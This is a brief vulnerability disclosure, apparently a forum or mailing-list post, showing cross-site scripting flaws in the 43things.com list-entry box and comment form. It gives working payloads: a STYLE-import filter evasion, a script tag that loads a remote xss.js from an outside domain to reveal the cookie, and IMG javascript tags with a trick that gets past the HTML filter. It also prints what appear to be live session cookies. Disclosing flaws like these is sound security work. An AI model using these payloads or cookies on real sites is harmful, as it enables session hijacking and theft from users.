43things.com - XSS with cookie disclosure
43things.com
Homepage:
http://www.43things.com
Affected files:
input box "I want to add to my list"
posting a comment
----------------------------------------
XSS vuln via input text of the box "I want to____"
When you add an item thats already on your list.
For a PoC we have style tags with broken up javascript. Put thisitem in your
list once, and then using the "I want to:" put it again:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Screenshots:
http://www.youfucktard.com/xsp/43things1.jpg
Now, in the same box even with no filter evasion we can even show our cookie.
try putting:
<script src=http://www.youfucktard.com/xss.js></script>
And then, once again, like above, try putting it again in the same box.
Our cookie:
"This is remote text via xss.js located at youfucktard.com
auth=7k5BtRfaYdbOdaaD%2BrHb8JGnJkroqKA2fR2Txs%2BO8BpvcxoRbeAe%2Bp3JZs2fhO7wu4IpF6ofcq1dROtVuHwTiQFkMV3U7pl%2FmcmA4ICJmLk%3D;
ubid=4G%2BZUgL4cQNV0JT1ixHx5obNSs0%3D;
_session_id=837ecebc52b1d47edd9c65e29a945de8;
AWSUSER_ID=awsuser_id1150241074938r6320;
AWSSESSION_ID=awssession_id1150241074938r6320"
Screenshots:
http://www.youfucktard.com/xsp/43things2.jpg
--------------------------------------
XSS via posting a comment.
Data here isn't properally sanatized here before being generated. We see that
even with no filtering we can insert something like:
<IMG SRC=javascript:alert('XSS')>
and it will create our xss example.
Screenshot3:
http://www.youfucktard.com/xsp/43things3.jpg
However, it wont actually insert the comment, it will just execute it. So to
bypass "malformed html found" error msg, we will use the numerial refference of
<> which is < and >, along with double beginning and ending tags. For a
PoC tryputting the code below as a comment:
<<<IMG SRC=javascript:alert('We%20Bypassed%20the%20filter!')>>>
Screenshots:
http://www.youfucktard.com/xsp/43things4.jpg